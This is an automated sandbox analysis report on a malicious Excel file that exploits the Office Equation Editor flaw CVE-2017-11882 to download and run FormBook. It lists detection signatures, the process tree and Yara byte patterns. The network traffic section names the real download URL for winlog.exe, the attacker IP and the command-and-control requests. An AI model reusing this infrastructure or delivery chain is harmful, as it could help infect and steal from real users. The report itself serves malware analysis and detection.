Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PI202009255687.xlsx

Overview

General Information

Sample Name:PI202009255687.xlsx
Analysis ID:323042
MD5:d7c0c12c1cdf36e9f97f96cb3fe16ae0
SHA1:e73e8bd48f5ef68747de444e44d59745cb75b08a
SHA256:76b2d9b4655b8a349e1b5c7bf05ac5bb22bea988bc818e46756b17d7e22a37d1
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2248 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2736 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2816 cmdline: 'C:\Users\Public\vbc.exe' MD5: E54D832CB872B7DC086AB7A7878D38FB)
      • vbc.exe (PID: 2484 cmdline: C:\Users\Public\vbc.exe MD5: E54D832CB872B7DC086AB7A7878D38FB)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wscript.exe (PID: 268 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 979D74799EA6C8B8167869A68DF5204A)
            • cmd.exe (PID: 2228 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        6.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.87, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2736, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2736, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.euVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeReversingLabs: Detection: 31%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 31%
          Multi AV Scanner detection for submitted fileShow sources
          Source: PI202009255687.xlsxReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJoe Sandbox ML: detected
          Source: 6.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49168
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 08:00:28 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 25 Nov 2020 21:20:21 GMTETag: "61800-5b4f4feb1ea84"Accept-Ranges: bytesContent-Length: 399360Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea aa c2 b4 ae cb ac e7 ae cb ac e7 ae cb ac e7 b0 99 28 e7 b4 cb ac e7 b0 99 39 e7 be cb ac e7 89 0d d7 e7 bf cb ac e7 ae cb ad e7 d8 cb ac e7 b0 99 2f e7 e7 cb ac e7 b0 99 38 e7 af cb ac e7 b0 99 3d e7 af cb ac e7 52 69 63 68 ae cb ac e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 ca be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 f6 04 00 00 00 00 00 97 35 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 06 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 b4 00 00 00 00 a0 04 00 a8 89 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 d0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 5c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 29 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bc 2b 00 00 00 40 01 00 00 2c 00 00 00 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 28 03 00 00 70 01 00 00 1e 03 00 00 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 89 01 00 00 a0 04 00 00 8a 01 00 00 78 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c2 14 00 00 00 30 06 00 00 16 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.lygosfilms.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.paletciniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.annaothomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 160.153.138.53 160.153.138.53
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.euConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420BD973.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.euConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.lygosfilms.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.paletciniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.annaothomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: text/html; charset=UTF-8X-Cacheable: YES:ForcedTransfer-Encoding: chunkedDate: Thu, 26 Nov 2020 08:01:45 GMTAge: 0Connection: closeVary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 30 30 37 65 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 2f 31 36 30 2e 31 35 33 2e 31 33 38 2e 35 33 2f 6f 76 7a 2e 64 30 33 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 6
